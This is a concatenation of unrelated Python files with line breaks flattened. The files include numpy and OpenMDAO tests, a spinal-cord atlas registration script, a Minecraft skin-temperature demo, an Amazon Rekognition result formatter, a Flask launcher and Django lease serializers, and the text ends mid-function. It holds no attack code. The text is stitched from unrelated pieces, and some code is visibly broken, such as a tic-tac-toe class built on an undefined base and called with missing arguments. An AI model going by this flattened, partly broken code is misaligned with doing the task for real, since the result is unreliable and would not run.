print(frequencyStack.pop()) print(frequencyStack.pop()) print(frequencyStack.pop()) print(frequencyStack.pop()) main() """ Time O(1) Space O(N) """ gvvynplaine/numpy import sys import pytest import numpy as np def test_financial_expired(): if sys.version_info[:2] >= (3, 7): match = 'NEP 32' else: match = None with pytest.raises(AttributeError, match=match): np.fv ml_source/src/blocktorch/blocktorch/utils/__init__.py """Utility methods.""" from .logger import get_logger, log_subtitle, log_title from .gen_utils import ( classproperty, import_or_raise, convert_to_seconds, get_random_state, get_random_seed, SEED_BOUNDS, jupyter_check, safe_repr, drop_rows_with_nans, pad_with_nans, _get_rows_without_nans, save_plot, is_all_numeric, get_importable_subclasses, _rename_column_names_to_numeric, deprecate_arg, ) from .cli_utils import ( get_blocktorch_root, get_installed_packages, get_sys_info, print_deps, print_info, print_sys_info, ) from .woodwork_utils import ( _retain_custom_types_and_initalize_woodwork, infer_feature_types, _convert_numeric_dataset_pandas, ) 0 #!/usr/bin/env python ######################################################################################### # # Register AMU_wm atlas to the PAM_cord segmentation, and also add missing slices at the top and bottom. # # --------------------------------------------------------------------------------------- # Copyright (c) 2016 Polytechnique Montreal # Author: # Created: 2016-08-26 # # About the license: see the file LICENSE.TXT ######################################################################################### #TODO: regularize transformations across z # Import common Python libraries import sys, io, os import numpy as np # append path that contains scripts, to be able to load modules path_script = os.path.dirname(__file__) # Get path of the toolbox path_sct = os.environ.get("SCT_DIR", os.path.dirname(os.path.dirname(__file__))) sys.path.append(os.path.join(path_sct, 'scripts')) import sct_utils as sct from msct_image import Image # parameters fname_wm = os.path.join(path_sct, "PAM50", "template", "PAM50_wm.nii.gz") fname_gm = os.path.join(path_sct, "PAM50", "template", "PAM50_gm.nii.gz") fname_cord = os.path.join(path_sct, "PAM50", "template", "PAM50_cord.nii.gz") # create temporary folder path_tmp = sct.tmp_create() # go to temp folder os.chdir(path_tmp) # open volumes im_wm = Image(fname_wm) data_wm = im_wm.data im_gm = Image(fname_gm) data_gm = im_gm.data im_cord = Image(fname_cord) data_cord = im_cord.data dim = im_cord.dim # sum wm/gm data_wmgm = data_wm + data_gm # get min/max z slices from wm/gm zsum = np.sum(np.sum(data_wmgm, 0), 0) zmin_wm = np.min(np.nonzero(zsum)) zmax_wm = np.max(np.nonzero(zsum)) # get min/max z slices from cord zsum = np.sum(np.sum(data_cord, 0), 0) zmin_cord = np.min(np.nonzero(zsum)) zmax_cord = np.max(np.nonzero(zsum)) # duplicate WM and GM atlas towards the top and bottom slices to match the cord template # bottom slices for iz in range(zmin_cord, zmin_wm): data_wm[:, :, iz] = data_wm[:, :, zmin_wm] data_gm[:, :, iz] = data_gm[:, :, zmin_wm] # top slices for iz in range(zmax_wm, zmax_cord): data_wm[:, :, iz] = data_wm[:, :, zmax_wm] data_gm[:, :, iz] = data_gm[:, :, zmax_wm] # save modified atlases im_wm.setFileName('wm_ext.nii.gz') im_wm.data = data_wm im_wm.save() im_gm.setFileName('gm_ext.nii.gz') im_gm.data = data_gm im_gm.save() # sum modified wm/gm data_wmgm = data_wm + data_gm # save wm/gm im_wm.setFileName('wmgm_ext.nii.gz') im_wm.data = data_wmgm im_wm.save() # register wmgm --> cord sct.run('cp '+fname_cord+' cord.nii.gz') # sct.run('sct_maths -i '+fname_cord+' -laplacian 1 -o cord.nii.gz') sct.run('sct_maths -i wmgm_ext.nii.gz -bin 0.5 -o wmgm_ext.nii.gz') # crop for faster registration sct.run('sct_crop_image -i cord.nii.gz -start 40,40,40 -end 100,100,990 -dim 0,1,2 -o cord_crop.nii.gz') sct.run('sct_crop_image -i wmgm_ext.nii.gz -start 40,40,40 -end 100,100,990 -dim 0,1,2 -o wmgm_ext_crop.nii.gz') # sct.run('sct_maths -i wmgm_ext.nii.gz -laplacian 1 -o wmgm_ext.nii.gz') #sct.run('sct_register_multimodal -i wmgm_ext.nii.gz -d cord.nii.gz -iseg wmgm_ext.nii.gz -dseg cord.nii.gz -param step=1,type=im,algo=bsplinesyn,iter=10,slicewise=1,metric=MeanSquares -x linear -r 0') sct.run('sct_register_multimodal -i wmgm_ext_crop.nii.gz -d cord_crop.nii.gz -param step=1,type=im,algo=affine,iter=100,slicewise=1,metric=MeanSquares,smooth=1:step=2,type=im,algo=bsplinesyn,iter=5,slicewise=0,metric=MeanSquares,smooth=0 -x linear -r 0') sct.run('sct_apply_transfo -i wm_ext.nii.gz -d cord.nii.gz -w warp_wmgm_ext2cord.nii.gz -x linear') # regularize along S-I direction # symmetrize # crop below a certain point sct.run('sct_crop_image -i wm_ext_reg.nii.gz -dim 2 -start 0 -end 990 -b 0 -o wm_ext_reg_crop.nii.gz') # rename new file sct.run('mv wm_ext_reg_crop.nii.gz PAM50_wm.nii.gz') # go back to previous folder #os.chdir('../') """ World Ended ========= A way in which the world terminates. """ from typing import Callable from dataclasses import dataclass @dataclass class WorldEnded(World): name: str condition: Callable[..., bool] end_state: EndState def states(self): pass def tictactoe_no_more_spaces(self): return all(block.state == TicTacToe_Block.Empty for block in self.blocks) def tictactoe_white_won(self): return any(self.three_in_a_row().all_white()) def tictactoe_black_won(self): return any(self.three_in_a_row().all_black()) TicTacToe_Full = WorldEnded("No more spaces.", TicTacToe_EndState.Draw) cheapjack/StasisCraft0 #!/usr/bin/python #Install the modules we need #from pyfirmata import Arduino, util, INPUT from mcpi import minecraft from mcpi import minecraftstuff from time import sleep import server import serial # Use the command /getpos or F3 in Minecraft client to find out where you are then use those # x, y, z coordinates to build things # translate mc coords for mcpi ones # add this to x mcx = 177 # - this from y mcy = 64 # - this from z mcz = 135 # Connect to the server we use the imported server.py to make it work with CloudMaker mc = minecraft.Minecraft.create(server.address) #Post a message to the minecraft chat window mc.postToChat("Ready to read Dermis Temperature 1!") dermisfull = False dermisfull2 = False dermisfull3 = False # Text Bubble 1 # use `/js blocktype("My\nMessage", blocktypenumbercode) to build text and note \n represents a new line def MemoryCloud1(startx,starty,startz, chartwidth, chartheight, chartdepth, blocktype, blockid): # Main Bubble mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + chartwidth, (starty-mcy) + chartheight, (startz - mcz) + chartdepth, blocktype, blockid) # inset bottom mc.setBlocks((startx + mcx) + 1, (starty-mcy) - 1, (startz-mcz), (startx + mcx) + (chartwidth-1), (starty-mcy) -1, (startz - mcz) + chartdepth, blocktype, blockid) #inset top mc.setBlocks((startx + mcx) + 1, (starty-mcy) + (chartheight + 1), (startz-mcz), (startx + mcx) + (chartwidth-1), (starty-mcy) + (chartheight + 1), (startz - mcz) + chartdepth, blocktype, blockid) # define a barchart function def DermisTemperatureBlock(startx, starty, startz, dermiswidth, dermisheight, blocktype, blockid): # Make a stage mc.setBlocks((startx + mcx) - 2, (starty-mcy), (startz-mcz) - 2, (startx + mcx) + (dermiswidth + 2), (starty-mcy), (startz - mcz) + (dermiswidth + 2), blocktype, blockid) # Make glass walls mc.setBlocks((startx + mcx) - 1, (starty-mcy), (startz-mcz) - 1, (startx + mcx) + dermiswidth + 1, (starty-mcy) + dermisheight, (startz - mcz) + 1 + dermiswidth, 20) # Hollow inside of walls mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + dermiswidth, (starty-mcy) + dermisheight, (startz - mcz) + dermiswidth, 0) #Take off the 'lid' mc.setBlocks((startx + mcx), (starty-mcy)+dermisheight, (startz-mcz), (startx + mcx) + dermiswidth, (starty-mcy) + dermisheight, (startz - mcz) + (dermiswidth), 0) # Make an underfloor light mc.setBlocks((startx + mcx) - 1, (starty-mcy) - 1, (startz-mcz) - 1, (startx + mcx) + dermiswidth + 1, (starty-mcy) - 1, (startz - mcz) + dermiswidth + 1, 89) mc.setBlocks((startx + mcx), (starty-mcy) - 1, (startz-mcz), (startx + mcx) + dermiswidth, (starty-mcy) - 1, (startz - mcz) + (dermiswidth), blocktype, blockid) def HairDown(startx, starty, startz, hairheight, blocktype, blockid): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + hairheight, (starty-mcy), (startz - mcz), blocktype, blockid) mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx), (starty-mcy) + hairheight, (startz - mcz), 0) def HairUp(startx, starty, startz, hairheight, blocktype, blockid): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + hairheight, (starty-mcy), (startz - mcz), 0) mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx), (starty-mcy) + hairheight, (startz - mcz), blocktype, blockid) def VasoDilate(startx, starty, startz, dilation, blocktype, blockid): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + 20, (starty-mcy), (startz - mcz) - dilation , blocktype, blockid) def VasoConstrict(startx, starty, startz, dilation, blocktype, blockid): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx) + 20, (starty-mcy), (startz - mcz) - 4 , 35, 2) mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz)-1, (startx + mcx) + 20, (starty-mcy), (startz - mcz) - dilation , blocktype, blockid) # Gonna make you sweat def Sweat(startx, starty, startz, sweatheight, blocktype): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx), (starty-mcy) + sweatheight, (startz - mcz), blocktype) def NoSweat(startx, starty, startz, sweatheight, blocktype): mc.setBlocks((startx + mcx), (starty-mcy), (startz-mcz), (startx + mcx), (starty-mcy) + sweatheight, (startz - mcz), 0) # Hair Response def DermisListener1(startx, starty, startz, dermisno): global dermisfull #Listen for blocks filling up leve blockType = mc.getBlock((startx + mcx), (starty - mcy), (startz - mcz), 1) if blockType != 0: print "It's really hot in SkinTemp ", dermisno, blockType sleep(0.5) #print "1st", dermisfull #mc.postToChat("WARNING! Dermis Sensor" + str(dermisno) + " is full!") HairDown(394, 89, -1150, 20, 35, 12) if not dermisfull: mc.postToChat("WARNING! Dermis Sensor" + str(dermisno) + " is full!") mc.postToChat("Triggering dermis Hair response") mc.postToChat("Hypothalamus you need to reduce temperature!") mc.postToChat("Hypothalamus, direct your response team!") sleep(0.5) HairDown(394, 89, -1150, 20, 35, 12) sleep(0.5) dermisfull = True #print "2nd", dermisfull else: if dermisfull: HairUp(394, 89, -1150, 20, 35, 12) print "Nothing from " + str(dermisno) dermisfull = False #print dermisFull sleep(5) # Vascular Dilation def DermisListener2(startx, starty, startz, dermisno): global dermisfull2 #Listen for blocks filling up level blockType = mc.getBlock((startx + mcx), (starty - mcy), (startz - mcz)) if blockType != 0: print "It's really hot in SkinTemp " , dermisno, blockType sleep(0.5) #print "1st", dermisfull2 #mc.postToChat("WARNING! Dermis Sensor" + str(dermisno) + " is full!") VasoDilate(393, 87, -1161, 4, 35, 14) #HairUp(394, 89, -1150, 20, 35, 12) if not dermisfull2: mc.postToChat("WARNING! Dermis Sensor" + str(dermisno) + " is full!") mc.postToChat("Hypothalamus you need to reduce temperature!") sleep(0.5) VasoDilate(393, 87, -1161, 4, 35, 14) sleep(0.5) dermisfull2 = True #print "2nd", dermisfull2 else: if dermisfull2: #HairDown(394, 89, -1150, 20, 35, 12) VasoConstrict(393, 87, -1161, 2, 35, 14) print "Nothing from " + str(dermisno) dermisfull2 = False #print dermisFull2 sleep(5) # Build First blocks # The MemoryCloud needs more x and less z to centre it # Overwrite Memory Text #MemoryCloud1(288, 105, -1164, 20, 12, 2, 35, 8) DermisTemperatureBlock(285, 89, -1160, 4, 10, 35, 4) # Second block #MemoryCloud1(334, 105, -1164, 20, 12, 2, 35, 6) DermisTemperatureBlock(332, 89, -1160, 4, 10, 35, 4) # Draw window into epidermis to observe vaso-dilation VasoDilate(393, 88, -1161, 4, 20, 0) # Draw a sweat example #Sweat(399, 84, -1176, 5, 8) #Main Loop while True: #Make a DermisListeners() and listen #arguments are startx, starty, startz, dermiswidth, dermisheight, dermisno # with the same width and thickness as the corresponding DermisTemperatureBlocks # SkinTemp 1 Hair Response #DermisListener1(285, 89, -1160, 1) DermisListener1(287, 99, -1158, 1) # Skin Temp2 Vascular system response DermisListener2(334, 99, -1158, 2) #DermisListener2(332, 99, -1155, 4, 10, 1) #DermisListener3(332, 89, -1160, 4, 10, 2) #while True: # Remember your chart is (x_coord, x_coord, x_coord, chartwidth, dermisheight, block block id(usually 0)) # TemperatureChart1(394, 68, -326, 2, 40, 35, 5) #TemperatureChart2(394, 68, -318, 2, 40, 35, 4) #TemperatureChart3(394, 68, -310, 2, 40, 35, 4) #TemperatureChart4(394, 68, -302, 2, 40, 35, 4) #TemperatureChart5(394, 68, -294, 2, 40, 35, 4) print "stopped" dataiku/dss-plugin-amazon-rekognition1-10 # -*- coding: utf-8 -*- """Module with classes to format Amazon Rekognition API results - extract meaningful columns from the API JSON response - draw bounding boxes """ from typing import Dict, List from enum import Enum from PIL import Image from fastcore.utils import store_attr from api_image_formatting import ImageAPIResponseFormatterMeta from plugin_io_utils import generate_unique, safe_json_loads from image_utils import auto_rotate_image, draw_bounding_box_pil_image # ============================================================================== # CONSTANT DEFINITION # ============================================================================== class UnsafeContentCategoryLevelEnum(Enum): TOP = "Top-level (simple)" SECOND = "Second-level (detailed)" class UnsafeContentCategoryTopLevelEnum(Enum): EXPLICIT_NUDITY = "Explicit Nudity" SUGGESTIVE = "Suggestive" VIOLENCE = "Violence" VISUALLY_DISTURBING = "Visually Disturbing" class UnsafeContentCategorySecondLevelEnum(Enum): NUDITY = "Nudity" GRAPHIC_MALE_NUDITY = "Graphic Male Nudity" GRAPHIC_FEMALE_NUDITY = "Graphic Female Nudity" SEXUAL_ACTIVITY = "Sexual Activity" ILLUSTRATED_NUDITY_OR_SEXUAL_ACTIVITY = "Illustrated Nudity Or Sexual Activity" ADULT_TOYS = "Adult Toys" FEMALE_SWIMWEAR_OR_UNDERWEAR = "Female Swimwear Or Underwear" MALE_SWIMWEAR_OR_UNDERWEAR = "Male Swimwear Or Underwear" PARTIAL_NUDITY = "Partial Nudity" REVEALING_CLOTHES = "Revealing Clothes" GRAPHIC_VIOLENCE_OR_GORE = "Graphic Violence Or Gore" PHYSICAL_VIOLENCE = "Physical Violence" WEAPON_VIOLENCE = "Weapon Violence" WEAPONS = "Weapons" SELF_INJURY = "Self Injury" EMACIATED_BODIES = "Emaciated Bodies" CORPSES = "Corpses" HANGING = "Hanging" # ============================================================================== # CLASS AND FUNCTION DEFINITION # ============================================================================== class ObjectDetectionLabelingAPIResponseFormatter(ImageAPIResponseFormatterMeta): """ Formatter class for Object Detection & Labeling API responses: - make sure response is valid JSON - extract object labels in a dataset - compute column descriptions - draw bounding boxes around objects with text containing label name and confidence score """ def __init__(self, num_objects: int, orientation_correction: bool = True, **kwargs): store_attr() self._compute_column_description() def _compute_column_description(self): """Compute output column names and descriptions""" self.orientation_column = generate_unique("orientation_correction", self.input_df.keys(), self.column_prefix) self.label_list_column = generate_unique("label_list", self.input_df.keys(), self.column_prefix) self.label_name_columns = [ generate_unique("label_" + str(n + 1) + "_name", self.input_df.keys(), self.column_prefix) for n in range(self.num_objects) ] self.label_score_columns = [ generate_unique("label_" + str(n + 1) + "_score", self.input_df.keys(), self.column_prefix) for n in range(self.num_objects) ] self.column_description_dict[self.label_list_column] = "List of object labels from the API" self.column_description_dict[self.orientation_column] = "Orientation correction detected by the API" for n in range(self.num_objects): label_column = self.label_name_columns[n] score_column = self.label_score_columns[n] self.column_description_dict[label_column] = "Object label {} extracted by the API".format(n + 1) self.column_description_dict[score_column] = "Confidence score in label {} from 0 to 1".format(n + 1) def format_row(self, row: Dict) -> Dict: """Extract object and label lists from a row with an API response""" raw_response = row[self.api_column_names.response] response = safe_json_loads(raw_response, self.error_handling) row[self.label_list_column] = "" labels = sorted(response.get("Labels", []), key=lambda x: x.get("Confidence"), reverse=True) if len(labels) != 0: row[self.label_list_column] = [l.get("Name") for l in labels] for n in range(self.num_objects): if len(labels) > n: row[self.label_name_columns[n]] = labels[n].get("Name", "") row[self.label_score_columns[n]] = labels[n].get("Confidence", "") else: row[self.label_name_columns[n]] = "" row[self.label_score_columns[n]] = None if self.orientation_correction: row[self.orientation_column] = response.get("OrientationCorrection", "") return row def format_image(self, image: Image, response: Dict) -> Image: """Draw bounding boxes around detected objects""" bounding_box_list_dict = [ { "name": label.get("Name", ""), "bbox_dict": instance.get("BoundingBox", {}), "confidence": float(instance.get("Confidence") / 100.0), } for label in response.get("Labels", []) for instance in label.get("Instances", []) ] if self.orientation_correction: detected_orientation = response.get("OrientationCorrection", "") (image, rotated) = auto_rotate_image(image, detected_orientation) bounding_box_list_dict = sorted(bounding_box_list_dict, key=lambda x: x.get("confidence", 0), reverse=True) for bounding_box_dict in bounding_box_list_dict: bbox_text = "{} - {:.1%} ".format(bounding_box_dict["name"], bounding_box_dict["confidence"]) ymin = bounding_box_dict["bbox_dict"].get("Top") xmin = bounding_box_dict["bbox_dict"].get("Left") ymax = ymin + bounding_box_dict["bbox_dict"].get("Height") xmax = xmin + bounding_box_dict["bbox_dict"].get("Width") draw_bounding_box_pil_image(image, ymin, xmin, ymax, xmax, bbox_text) return image class TextDetectionAPIResponseFormatter(ImageAPIResponseFormatterMeta): """ Formatter class for Text Detection API responses: - make sure response is valid JSON - extract list of text transcriptions in a dataset - compute column descriptions - draw bounding boxes around detected text areas """ def __init__(self, minimum_score: float = 0.0, orientation_correction: bool = True, **kwargs): store_attr() self._compute_column_description() def _compute_column_description(self): """Compute output column names and descriptions""" self.orientation_column = generate_unique("orientation_correction", self.input_df.keys(), self.column_prefix) self.text_column_list = generate_unique("detections_list", self.input_df.keys(), self.column_prefix) self.text_column_concat = generate_unique("detections_concat", self.input_df.keys(), self.column_prefix) self.column_description_dict[self.text_column_list] = "List of text detections from the API" self.column_description_dict[self.text_column_concat] = "Concatenated text detections from the API" self.column_description_dict[self.orientation_column] = "Orientation correction detected by the API" def format_row(self, row: Dict) -> Dict: """Extract detected text from a row with an API response""" raw_response = row[self.api_column_names.response] response = safe_json_loads(raw_response, self.error_handling) text_detections = response.get("TextDetections", []) text_detections_filtered = [ t for t in text_detections if t.get("Confidence") >= self.minimum_score and t.get("ParentId") is None ] row[self.text_column_list] = "" row[self.text_column_concat] = "" if len(text_detections_filtered) != 0: row[self.text_column_list] = [t.get("DetectedText", "") for t in text_detections_filtered] row[self.text_column_concat] = " ".join(row[self.text_column_list]) if self.orientation_correction: row[self.orientation_column] = response.get("OrientationCorrection", "") return row def format_image(self, image: Image, response: Dict) -> Image: """Draw bounding boxes around detected text""" text_detections = response.get("TextDetections", []) text_bounding_boxes = [ t.get("Geometry", {}).get("BoundingBox", {}) for t in text_detections if t.get("Confidence") >= self.minimum_score and t.get("ParentId") is None ] if self.orientation_correction: detected_orientation = response.get("OrientationCorrection", "") (image, rotated) = auto_rotate_image(image, detected_orientation) for bbox in text_bounding_boxes: ymin = bbox.get("Top") xmin = bbox.get("Left") ymax = bbox.get("Top") + bbox.get("Height") xmax = bbox.get("Left") + bbox.get("Width") draw_bounding_box_pil_image(image=image, ymin=ymin, xmin=xmin, ymax=ymax, xmax=xmax) return image class UnsafeContentAPIResponseFormatter(ImageAPIResponseFormatterMeta): """ Formatter class for Unsafe Content API responses: - make sure response is valid JSON - extract moderation labels in a dataset - compute column descriptions """ def __init__( self, category_level: UnsafeContentCategoryLevelEnum = UnsafeContentCategoryLevelEnum.TOP, content_categories_top_level: List[UnsafeContentCategoryTopLevelEnum] = [], content_categories_second_level: List[UnsafeContentCategorySecondLevelEnum] = [], **kwargs ): store_attr() if self.category_level == UnsafeContentCategoryLevelEnum.TOP: self.content_category_enum = UnsafeContentCategoryTopLevelEnum self.content_categories = content_categories_top_level else: self.content_category_enum = UnsafeContentCategorySecondLevelEnum self.content_categories = content_categories_second_level self._compute_column_description() def _compute_column_description(self): """Compute output column names and descriptions""" self.is_unsafe_column = generate_unique("unsafe_content", self.input_df.keys(), self.column_prefix) self.unsafe_list_column = generate_unique("unsafe_categories", self.input_df.keys(), self.column_prefix) self.column_description_dict[self.is_unsafe_column] = "Unsafe content detected by the API" self.column_description_dict[self.unsafe_list_column] = "List of unsafe content categories detected by the API" for n, m in self.content_category_enum.__members__.items(): confidence_column = generate_unique(n.lower() + "_score", self.input_df.keys(), self.column_prefix) self.column_description_dict[confidence_column] = "Confidence score in category '{}' from 0 to 1".format( m.value ) def format_row(self, row: Dict) -> Dict: """Extract moderation labels from a row with an API response""" raw_response = row[self.api_column_names.response] response = safe_json_loads(raw_response, self.error_handling) moderation_labels = response.get("ModerationLabels", []) row[self.is_unsafe_column] = False row[self.unsafe_list_column] = "" unsafe_list = [] for category in self.content_categories: confidence_column = generate_unique( category.name.lower() + "_score", self.input_df.keys(), self.column_prefix ) row[confidence_column] = "" if self.category_level == UnsafeContentCategoryLevelEnum.TOP: scores = [l.get("Confidence") for l in moderation_labels if l.get("ParentName", "") == category.value] else: scores = [l.get("Confidence") for l in moderation_labels if l.get("Name", "") == category.value] if len(scores) != 0: unsafe_list.append(str(category.value)) row[confidence_column] = scores[0] if len(unsafe_list) != 0: row[self.is_unsafe_column] = True row[self.unsafe_list_column] = unsafe_list return row 10-100 from os import environ from auth import app app.run(environ.get("HOST", "127.0.0.1"), environ.get("PORT", 5000), debug=True) import ezdxf doc = ezdxf.new('R2000') # hatch requires the DXF R2000 (AC1015) format or later msp = doc.modelspace() # adding entities to the model space # important: major axis >= minor axis (ratio <= 1.) # minor axis length = major axis length * ratio msp.add_ellipse((0, 0), major_axis=(0, 10), ratio=0.5) # by default a solid fill hatch with fill color=7 (white/black) hatch = msp.add_hatch(color=2) # every boundary path is always a 2D element edge_path = hatch.paths.add_edge_path() # each edge path can contain line arc, ellipse and spline elements # important: major axis >= minor axis (ratio <= 1.) edge_path.add_ellipse((0, 0), major_axis=(0, 10), ratio=0.5) doc.saveas("solid_hatch_ellipse.dxf") jameswilddev/Fau from .array_set import ArraySet from .u8 import U8 from .s8 import S8 from .u16 import U16 from .s16 import S16 from .u32 import U32 from .s32 import S32 from .f32 import F32 __all__ = ['ArraySet', 'U8', 'S8', 'U16', 'S16', 'U32', 'S32', 'F32'] friedenhe/OpenMDAOopenmdao/utils/tests/test_array_utils.py100-1000 import unittest import numpy as np from openmdao.utils.array_utils import array_connection_compatible, abs_complex, dv_abs_complex from openmdao.utils.assert_utils import assert_near_equal class TestArrayConnectionCompatible(unittest.TestCase): def test_ones_at_both_ends(self): shape1 = (1, 1, 15, 3, 1, 7, 1, 1, 1, 1) shape2 = (1, 15, 3, 1, 7) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_ones_at_start(self): shape1 = (1, 1, 15, 3, 1, 7) shape2 = (1, 15, 3, 1, 7) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_ones_at_end(self): shape1 = (15, 3, 1, 7, 1, 1, 1, 1) shape2 = (1, 15, 3, 1, 7) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_ones_to_ones(self): shape1 = (1, 1, 1, 1, 1, 1, 1, 1) shape2 = (1, 1, 1, 1, 1) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_ones_to_one(self): shape1 = (1, 1, 1, 1, 1, 1, 1, 1) shape2 = (1,) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_matrix_to_vectorized_matrix(self): shape1 = (3, 3) shape2 = (1, 3, 3) self.assertTrue(array_connection_compatible(shape1, shape2)) def test_known_incompatable(self): shape1 = (3, 3) shape2 = (3, 1, 3) self.assertFalse(array_connection_compatible(shape1, shape2)) class TestArrayUtils(unittest.TestCase): def test_abs_complex(self): x = np.array([3.0 + 0.5j, -4.0 - 1.5j, -5.0 + 2.5j, -6.0 - 3.5j]) y = abs_complex(x) self.assertEqual(y[0], 3.0 + 0.5j) self.assertEqual(y[1], 4.0 + 1.5j) self.assertEqual(y[2], 5.0 - 2.5j) self.assertEqual(y[3], 6.0 + 3.5j) x = np.array([3.0 + 0.5j, -4.0 - 1.5j, -5.0 + 2.5j, -6.0 - 3.5j]) dx = 1.0 + 2j * np.ones((4, 3), dtype=complex) yy, dy = dv_abs_complex(x, dx) row = np.array([1.0 + 2j, 1.0 + 2j, 1.0 + 2j]) dy_check = np.vstack((row, -row, -row, -row)) assert_near_equal(dy, dy_check, 1e-10) if __name__ == "__main__": unittest.main() from django.contrib.contenttypes.models import ContentType from django.contrib.gis.db.models import Union from django.db.models import DurationField, Q from django.db.models.functions import Cast from django.utils.translation import ugettext_lazy as _ from enumfields.drf import EnumField, EnumSupportSerializerMixin from rest_framework import serializers from field_permissions.serializers import FieldPermissionsSerializerMixin from leasing.enums import LeaseRelationType from leasing.models import ( AreaNote, BasisOfRent, EmailLog, InfillDevelopmentCompensation, RelatedLease, ReservationProcedure) from leasing.serializers.debt_collection import ( CollectionCourtDecisionSerializer, CollectionLetterSerializer, CollectionNoteSerializer) from leasing.serializers.invoice import InvoiceNoteCreateUpdateSerializer, InvoiceNoteSerializer from users.models import User from users.serializers import UserSerializer from ..models import ( Contact, District, Financing, Hitas, IntendedUse, Lease, LeaseIdentifier, LeaseType, Municipality, NoticePeriod, Regulation, SpecialProject, StatisticalUse, SupportiveHousing) from .contact import ContactSerializer from .contract import ContractCreateUpdateSerializer, ContractSerializer from .decision import DecisionCreateUpdateNestedSerializer, DecisionSerializer from .inspection import InspectionSerializer from .land_area import ( LeaseAreaCreateUpdateSerializer, LeaseAreaListSerializer, LeaseAreaSerializer, LeaseAreaWithGeometryListSerializer) from .rent import ( LeaseBasisOfRentCreateUpdateSerializer, LeaseBasisOfRentSerializer, RentCreateUpdateSerializer, RentSerializer) from .tenant import TenantCreateUpdateSerializer, TenantSerializer from .utils import InstanceDictPrimaryKeyRelatedField, NameModelSerializer, UpdateNestedMixin class DistrictSerializer(serializers.ModelSerializer): class Meta: model = District fields = '__all__' class FinancingSerializer(serializers.ModelSerializer): class Meta: model = Financing fields = '__all__' class HitasSerializer(serializers.ModelSerializer): class Meta: model = Hitas fields = '__all__' class IntendedUseSerializer(serializers.ModelSerializer): class Meta: model = IntendedUse fields = '__all__' class LeaseTypeSerializer(EnumSupportSerializerMixin, serializers.ModelSerializer): class Meta: model = LeaseType fields = '__all__' class MunicipalitySerializer(NameModelSerializer): class Meta: model = Municipality fields = '__all__' class NoticePeriodSerializer(EnumSupportSerializerMixin, serializers.ModelSerializer): class Meta: model = NoticePeriod fields = '__all__' class RegulationSerializer(NameModelSerializer): class Meta: model = Regulation fields = '__all__' class StatisticalUseSerializer(NameModelSerializer): class Meta: model = StatisticalUse fields = '__all__' class SupportiveHousingSerializer(NameModelSerializer): class Meta: model = SupportiveHousing fields = '__all__' class SpecialProjectSerializer(NameModelSerializer): class Meta: model = SpecialProject fields = '__all__' class ReservationProcedureSerializer(NameModelSerializer): class Meta: model = ReservationProcedure fields = '__all__' class LeaseIdentifierSerializer(serializers.ModelSerializer): type = LeaseTypeSerializer() municipality = MunicipalitySerializer() district = DistrictSerializer() class Meta: model = LeaseIdentifier fields = ('type', 'municipality', 'district', 'sequence') class LeaseSuccinctSerializer(EnumSupportSerializerMixin, FieldPermissionsSerializerMixin, serializers.ModelSerializer): id = serializers.ReadOnlyField() type = LeaseTypeSerializer() municipality = MunicipalitySerializer() district = DistrictSerializer() identifier = LeaseIdentifierSerializer(read_only=True) class Meta: model = Lease fields = ('id', 'deleted', 'created_at', 'modified_at', 'type', 'municipality', 'district', 'identifier', 'start_date', 'end_date', 'state', 'is_rent_info_complete', 'is_invoicing_enabled', 'reference_number', 'note', 'preparer', 'is_subject_to_vat') class LeaseSuccinctWithGeometrySerializer(LeaseSuccinctSerializer): lease_areas = LeaseAreaWithGeometryListSerializer(many=True, required=False, allow_null=True) class Meta: model = Lease fields = ('id', 'deleted', 'created_at', 'modified_at', 'type', 'municipality', 'district', 'identifier', 'start_date', 'end_date', 'state', 'is_rent_info_complete', 'is_invoicing_enabled', 'reference_number', 'note', 'preparer', 'is_subject_to_vat', 'lease_areas') class RelatedToLeaseSerializer(EnumSupportSerializerMixin, serializers.ModelSerializer): to_lease = LeaseSuccinctSerializer() class Meta: model = RelatedLease fields = '__all__' class RelatedLeaseSerializer(EnumSupportSerializerMixin, serializers.ModelSerializer): def validate(self, data): if data['from_lease'] == data['to_lease']: raise serializers.ValidationError(_("from_lease and to_lease cannot be the same Lease")) return data class Meta: model = RelatedLease fields = '__all__' class RelatedFromLeaseSerializer(EnumSupportSerializerMixin, serializers.ModelSerializer): from_lease = LeaseSuccinctSerializer() class Meta: model = RelatedLease fields = '__all__' class LeaseSerializerBase(EnumSupportSerializerMixin, FieldPermissionsSerializerMixin, serializers.ModelSerializer): id = serializers.ReadOnlyField() type = LeaseTypeSerializer() municipality = MunicipalitySerializer() district = DistrictSerializer() identifier = LeaseIdentifierSerializer(read_only=True) tenants = TenantSerializer(many=True, required=False, allow_null=True) lease_areas = LeaseAreaSerializer(many=True, required=False, allow_null=True) lessor = ContactSerializer(required=False, allow_null=True) contracts = ContractSerializer(many=True, required=False, allow_null=True) decisions = DecisionSerializer(many=True, required=False, allow_null=True) inspections = InspectionSerializer(many=True, required=False, allow_null=True) rents = RentSerializer(many=True, required=False, allow_null=True) basis_of_rents = LeaseBasisOfRentSerializer(many=True, required=False, allow_null=True) collection_court_decisions = CollectionCourtDecisionSerializer(many=True, required=False, allow_null=True) collection_letters = CollectionLetterSerializer(many=True, required=False, allow_null=True) collection_notes = CollectionNoteSerializer(many=True, required=False, allow_null=True) invoice_notes = InvoiceNoteSerializer(many=True, required=False, allow_null=True) class Meta: model = Lease exclude = ('related_leases', ) class LeaseListSerializer(LeaseSerializerBase): basis_of_rents = None contracts = None decisions = None inspections = None rents = None related_leases = None lease_areas = LeaseAreaListSerializer(many=True, required=False, allow_null=True) collection_court_decisions = None collection_letters = None collection_notes = None def get_related_lease_predecessors(to_lease_id, accumulator=None): 